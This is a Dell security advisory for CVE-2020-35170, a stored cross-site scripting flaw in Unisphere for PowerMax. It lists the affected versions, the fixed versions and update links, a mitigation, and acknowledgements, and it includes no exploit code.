DSA-2020-277: Dell EMC Unisphere PowerMax Cross-Site Scripting (XSS) Vulnerability
Summary: Dell EMC Unisphere PowerMax contains remediation for a Cross-Site Scripting (XSS) Vulnerability that could be exploited by malicious users to compromise the affected system.
This article applies to
This article does not apply to
This article is not tied to any specific product.
Not all product versions are identified in this article.
Impact
Medium
Details
| Proprietary Code CVE(s) | Description | CVSSBase Score | CVSS Vector String |
| CVE-2020-35170 |
Dell EMC Unisphere for PowerMax versions prior to 9.1.0.24 contain a Stored Cross-Site Scripting vulnerability. A remote, authenticated attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery | 6.3 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| Proprietary Code CVE(s) | Description | CVSSBase Score | CVSS Vector String |
| CVE-2020-35170 |
Dell EMC Unisphere for PowerMax versions prior to 9.1.0.24 contain a Stored Cross-Site Scripting vulnerability. A remote, authenticated attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery | 6.3 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
Affected Products & Remediation
| Product | Affected Version(s) | Updated Version(s) | Link to Update |
| Unisphere for PowerMax | Versions prior to 9.1.0.24 | 9.1.0.24 EEM: 9.1.0.853 |
https://www.dell.com/support/home/en-us/product-support/product/unisphere-powermax/drivers |
| Unisphere for PowerMax | Versions prior to 9.2.0.6 | 9.2.0.6 EEM: 9.2.0.1018 |
https://www.dell.com/support/home/en-us/product-support/product/unisphere-powermax/drivers |
| PowerMax OS | 5978 | 5978 | Request OPT 577141 Request OPT 576388 |
| Product | Affected Version(s) | Updated Version(s) | Link to Update |
| Unisphere for PowerMax | Versions prior to 9.1.0.24 | 9.1.0.24 EEM: 9.1.0.853 |
https://www.dell.com/support/home/en-us/product-support/product/unisphere-powermax/drivers |
| Unisphere for PowerMax | Versions prior to 9.2.0.6 | 9.2.0.6 EEM: 9.2.0.1018 |
https://www.dell.com/support/home/en-us/product-support/product/unisphere-powermax/drivers |
| PowerMax OS | 5978 | 5978 | Request OPT 577141 Request OPT 576388 |
Workarounds & Mitigations
Any chart or dashboard with stored cross-site scripting needs to be deleted to remove the stored XSS.
Revision History
| Revision | Date | Description |
| 1.0 | 2020-12-14 | Initial Release |
Acknowledgements
Dell would like to thank Tomasz Stachowicz and Przemek Nowakowski for reporting this issue.
Related Information
Legal Disclaimer
Affected Products
PowerMaxOS 5978, Unisphere for PowerMaxArticle Properties
Article Number: 000181212
Article Type: Dell Security Advisory
Last Modified: 17 Dec 2020
Find answers to your questions from other Dell users
Support Services
Check if your device is covered by Support Services.